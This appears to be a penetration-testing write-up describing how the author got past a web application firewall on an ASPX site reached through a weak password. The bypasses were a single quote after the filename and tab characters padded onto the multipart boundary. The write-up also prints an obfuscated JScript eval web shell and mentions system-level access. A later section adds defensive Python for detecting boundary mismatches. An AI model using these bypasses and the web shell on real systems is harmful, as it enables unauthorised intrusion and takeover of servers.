0x01 Background
Logged into a backend with a weak password; it has an arbitrary file upload, sitting behind a WAF.
Testing shows that a file with the aa suffix uploads successfully, and the file path can be seen in the response.
Uploading an aspx directly was blocked.
0x02 Bypassing suffix detection
First simply tried changing the case of the extension: blocked. ashx, asmx, asp and cer are all blocked too.
Uploading cshtml directly: see https://www.cnblogs.com/cwkiller/p/12087890.html
Visiting it redirects to a 404; presumably the extension is not parsed.
Next tried bypassing the WAF's suffix detection directly. After a simple test, it can be bypassed by adding a single quote after the double quote.
0x03 Bypassing content detection
Went straight to Behinder (ice scorpion) and found that the WAF intercepted the shell content.
Embedding the shell in the middle of copied image content still does not get through. Some WAFs pass a packet straight through once it is large enough; that did not work either, the packet was still blocked after I padded it with the content of a large image.
No WAF had shown up on this site during the earlier injection testing. Sending the one-liner shell in a plain POST (not in upload format) directly was not intercepted.
Guess: the WAF decides that a packet is an upload from Content-Type: multipart/form-data, and only then inspects the content.
So how does the WAF parse the POST packet? The uploaded content is located based on
Content-Type: multipart/form-data; boundary=---------------------------7e43d3910182
that is, the boundary value of the Content-Type: ---------------------------7e43d3910182
So the idea: append a number of Tab characters after ---------------------------7e43d3910182. The server still parses the uploaded content normally, while the WAF may use ---------------------------7e43d3910182TabTab to locate the uploaded content, fail to find it, and be bypassed. Just have to test it.
Bingo, content detection bypassed.
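From the defender's side, the point above is that the WAF took the boundary parameter literally while the server trimmed the trailing tabs. The following is an added example (not code from the original post) showing a naive boundary extraction beside a normalising one, plus a check that flags a request whose literal boundary fails to delimit the body but whose normalised boundary does; the request is constructed.

```python
import re

# Constructed sample: the boundary from the write-up with two trailing tabs in the header.
SAMPLE_BOUNDARY = "---------------------------7e43d3910182"
SAMPLE_CONTENT_TYPE = "multipart/form-data; boundary=" + SAMPLE_BOUNDARY + "\t\t"
CLEAN_CONTENT_TYPE = "multipart/form-data; boundary=" + SAMPLE_BOUNDARY
SAMPLE_BODY = (
    "--" + SAMPLE_BOUNDARY + "\r\n"
    'Content-Disposition: form-data; name="file"; filename="test.jpg"\r\n'
    "Content-Type: image/jpeg\r\n\r\n"
    "CONSTRUCTED FILE CONTENT\r\n"
    "--" + SAMPLE_BOUNDARY + "--\r\n"
)


def naive_boundary(content_type: str) -> str:
    """Takes the boundary parameter literally, trailing tabs included (the weak parser)."""
    m = re.search(r"boundary=([^;]*)", content_type)
    return m.group(1) if m else ""


def robust_boundary(content_type: str) -> str:
    """Strips surrounding whitespace (tabs, spaces, CR/LF) and optional quotes, as a lenient server does."""
    m = re.search(r"boundary=([^;]*)", content_type)
    if not m:
        return ""
    return m.group(1).strip(" \t\r\n").strip('"')


def split_parts(body: str, boundary: str) -> list:
    """Returns the raw text of every part delimited by --boundary; [] if the delimiter never matches."""
    delim = "--" + boundary
    if delim + "\r\n" not in body:
        return []
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith("--"):  # closing delimiter --boundary--
            break
        parts.append(chunk.lstrip("\r\n"))
    return parts


def boundary_mismatch(content_type: str, body: str) -> bool:
    """Evasion indicator: the literal boundary finds no parts, but the normalised boundary does."""
    literal = split_parts(body, naive_boundary(content_type))
    normalised = split_parts(body, robust_boundary(content_type))
    return not literal and bool(normalised)
```

A WAF that normalises the boundary the same way the backend does (or rejects requests where the two disagree) closes this gap.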
0x04 A strange 404
Upload succeeded; first visit the shell.
Still a 404 here. Where is the problem? You cannot even connect to the shell directly. Then I remembered that a jsp site I uploaded to before also always returned 404: https://www.cnblogs.com/cwkiller/p/11788009.html
It may be that a shell which outputs content does not 404. Uploaded the big shell directly and connected successfully with system permission.
To verify whether it is shells with content output that do not 404, upload an aspx that prints the current time:
<%@Page Language="C#"%>
<%
// Write the server's current time into the response, then delete this test page itself
Response.Write(DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss"));
System.IO.File.Delete(Request.PhysicalPath);
%>
That confirmed the guess. Added a statement that outputs hello,world to the AntSword one-liner:
<%@ Page Language="Jscript" Debug=true%>
<%
Response.Write("hello,world");
var hw=Request.Form("mr6");
var du='iNUZuDe';
var zu=du.replace("iNUZuD","unsaf");
function RIEo(BWrg)
{eval(BWrg,zu);}
RIEo(hw);
%>
Bring the cookie along (files in this directory require login to access) and the connection succeeds.